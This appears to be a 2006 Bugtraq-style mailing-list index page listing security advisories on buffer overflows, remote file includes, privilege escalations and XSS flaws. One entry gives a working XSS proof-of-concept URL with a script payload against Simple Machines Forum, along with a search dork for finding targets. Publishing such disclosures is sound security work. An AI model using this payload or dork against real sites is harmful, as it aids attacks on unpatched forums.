|
|
Prev week |
Colapse all |
Post message
[ GLSA 200610-09 ] libmusicbrainz: Multiple buffer overflows 2006-10-22 Matthias Geerdsen (vorlon gentoo org) [USN-368-1] Qt vulnerability 2006-10-23 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-368-1 October 23, 2006 qt-x11-free vulnerability CVE-2006-4811 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5. [ more ] [ reply ] Hustle Labs & MNIN eDirectory Vulnerability 2006-10-21 Ryan Smith (whatstheaddress gmail com) As of 20-October-2006, Ryan Smith from Hustle Labs (http://www.hustlelabs.com) and Michael Ligh from MNIN (http://www.mnin.org) have released an advisory detailing a vulnerability in Novell eDirectory HTTPStk. This vulnerability occurs when processing HTTP Request headers and can be triggered by a [ more ] [ reply ] Virtual Law Office (phpc_root_path) Remote File Include Vulnerability 2006-10-21 xorontr gmail com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-= Virtual Law Office (phpc_root_path) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-= Author: xoron Tum islam aleminin Ramazan Ba [ more ] [ reply ] Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability 2006-10-21 xorontr gmail com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-= Open Meetings Filing Application (PROJECT_ROOT) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-= Author: xoron Tum islam aleminin [ more ] [ reply ] Re: Simple Machines Forum (SMF) XSS issue 2006-10-21 mrapples gmail com Good find on this. Here is the fix I applied: Find on line ~85 in Sources/Search.php: foreach ($temp_params as $i => $data) { @list ($k, $v) = explode('|\'|', $data); $context['search_params'][$k] = stripslashes($v); } Change to: foreach ($temp_params as $i => $data) { @list ($k, $ [ more ] [ reply ] Re: iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-20 Steven M. Christey (coley mitre org) Re: Flaw in Firefox 2.0 RC2 2006-10-20 Jure PeÄar (pegasus nerv eu org) On Thu, 19 Oct 2006 13:05:48 -0400 Mark A Basil <mark.basil (at) markmonitor (dot) com [email concealed]> wrote: > It is also affecting any browser using the Gecko rendering engine > (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to > 'Firefox'. > > -m > > On Wed, 2006-10-18 at 10:28 +1000, jm wrote: > [ more ] [ reply ] Advisory for Oneorzero helpdesk 2006-10-20 Mike Klingler (whitehatguru gmail com) Permanant Link : http://www.whitedust.net/speaks/3043/ ------------------------------------------------------------ - Advisory for OneOrZero Helpdesk - ------------------------------------------------------------ - OneOrZero Helpdesk - AFFECTED PRODUCTS ================= OneOrZero Helpdesk v [ more ] [ reply ] PHP Poll Creator 1.04 (poll_vote.php)File Include 2006-10-20 mahmood ali (mah_k_2000 hotmail com) ################################################### PHP Poll Creator 1.04 (poll_vote.php)File Include ################################################### Source Code: http://www.phppc.de/download/phppc_104.zip ################################################### Vulnerable Code:_ include $relativ [ more ] [ reply ] [security bulletin] HPSBTU02163 SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code 2006-10-20 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00793805 Version: 1 HPSBTU02163 SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon [ more ] [ reply ] HPSBUX02162 SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code 2006-10-20 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00793091 Version: 1 HPSBUX02162 SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possi [ more ] [ reply ] Simple Machines Forum (SMF) XSS issue 2006-10-20 josecarlos norte gmail com title: Simple Machines Forum (SMF) XSS issue author: Jose Carlos Norte discovered by: Jose Carlos Norte 1. introduction Simple machines forum is a popular scalable free bulletin board system written in php over mysql database, the url of the project: http://www.simplemachines.org/ 2. XSS proble [ more ] [ reply ] [KAPDA::#60] Mambo V4.6.x vulnerabilities 2006-10-20 alireza hassani (trueend5 yahoo com) KAPDA New advisory Vendor: http://www.mamboserver.com Vulnerable Versions: 4.6.x Bug: XSS, Html Injection, Sql Injection Exploitation: Remote with browser Description: -------------------- Mambo is a feature-rich dynamic portal engine/content management tool capable of building sites from several [ more ] [ reply ] [CAID 34693, 34694]: CA BrightStor ARCserve Backup Multiple Buffer Overflow Vulnerabilities (UPDATED) 2006-10-20 Williams, James K (James Williams ca com) Our original fixes for the BrightStor ARCserve Backup vulnerabilities that we publicly disclosed on 2006-10-05 (http://www3.ca.com/securityadvisor/blogs/posting.aspx?id=90744&pid=9377 5&date=2006/10) did not completely resolve one of the vulnerabilities. Consequently, we have released new f [ more ] [ reply ] Re: iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-20 abel andrade lycos com Re: PHP "exec", "system", "popen" (+small POC) 2006-10-20 Bernhard Mueller (research sec-consult com) Hello, This is not a new problem (see http://www.securityfocus.com/bid/9302). However, we also "discovered" this a few weeks ago and contacted Apache and PHP about it. According to Stefan Esser (PHP) its due to Apache's failure to open file descriptors with the close on exec flag. However, accordin [ more ] [ reply ] PHP Classifieds 7.1 - Remote File Include Vulnerability 2006-10-20 Le CoPrA hotmail com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # PHP Classifieds 7.1 - Remote File Include Vulnerability =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Download : http://softadmin.deltascripts.com/download_get.php?id=32 =-=-=-=-=-=-=-=-=-=-=- [ more ] [ reply ] [Reversemode Advisory] Kaspersky Anti-Virus Privilege Escalation 2006-10-20 Reversemode (advisories reversemode com) Hi, Kaspersky Products are prone to a local privilege escalation. Unprivileged users can exploit this flaw in order to execute arbitrary code with Kernel privileges. Kaspersky implements its NDIS-TDI Hooking Engine using two drivers, which rely on an internal system of plugins. Plugin registering [ more ] [ reply ] RE: Flaw in Firefox 2.0 RC2 2006-10-18 Aras \Russ\ Memisyazici (arasm vt edu) Oddly enough my IE6.0 patched to the hilt as of 10/18/06 froze and wouldn't let me close. I had to kill it via Sysinternals' ProcessExplorer! -----Original Message----- From: jm [mailto:jm (at) hcn.com (dot) au [email concealed]] Sent: Tuesday, October 17, 2006 8:28 PM To: bugtraq (at) securityfocus (dot) com [email concealed] Subject: Re: Flaw in Firefo [ more ] [ reply ] iDefense Security Advisory 10.19.06: Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability 2006-10-19 iDefense Labs (labs-no-reply idefense com) Kaspersky Labs Anti-Virus IOCTL Local Privilege Escalation Vulnerability iDefense Security Advisory 10.19.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 19, 2006 I. BACKGROUND Kaspersky Anti-Virus provides virus and spyware protection. More information about Kaspersky Labs Anti-Viru [ more ] [ reply ] [ MDKSA-2006:186 ] - Updated kdelibs packages fix KHTML vulnerability 2006-10-19 security mandriva com TORQUE Spool Job Race condition (torque <= 2.0.0p8) 2006-10-18 Luís Miguel Silva (lms ispgaya pt) Hello all, Back in March i audited a software called TORQUE Resource Manager and found a critical race condition vulnerability which could be used by malicious users to escalate their privileges. "TORQUE is an open source resource manager providing control over batch jobs and distributed compute n [ more ] [ reply ] Re: Flaw in Firefox 2.0 RC2 2006-10-19 Mark A Basil (mark basil markmonitor com) It is also affecting any browser using the Gecko rendering engine (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to 'Firefox'. -m On Wed, 2006-10-18 at 10:28 +1000, jm wrote: > Firefox 1.5.07 on CentOS died quite nicely too. > > Mike (at) gmail (dot) com [email concealed] wrote: > > http://lcamtuf.core [ more ] [ reply ] [Xss] IN SMF 1.1 RC2 2006-10-19 the_free_kernel b0rizq net #InFo ----- # Site : www.simplemachines.org # Dork : Powered by SMF 1.1 RC2 # File : index.php? # By : b0rizQ # E-Mail : The_FreE_KernEl (at) b0rizQ (dot) nET [email concealed] -------------------------------- [Xss] www.[traget].com/index.php?action=login2"><script>alert('xss-by-b0rizQ') </script> ------------------------------ [ more ] [ reply ] RE: Flaw in Firefox 2.0 RC2 2006-10-19 Sean Warnock (swarnock warnocksolutions com) -----Original Message----- From: Mike (at) gmail (dot) com [email concealed] [mailto:Mike (at) gmail (dot) com [email concealed]] Sent: Tuesday, October 17, 2006 2:10 AM To: bugtraq (at) securityfocus (dot) com [email concealed] Subject: Flaw in Firefox 2.0 RC2 http://lcamtuf.coredump.cx/ffoxdie.html this exploit still works with the latest Firefox 2.0 RC3 Hmmm after a quickie chec [ more ] [ reply ] |
|
Privacy Statement |
Gentoo Linux Security Advisory GLSA 200610-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
[ more ] [ reply ]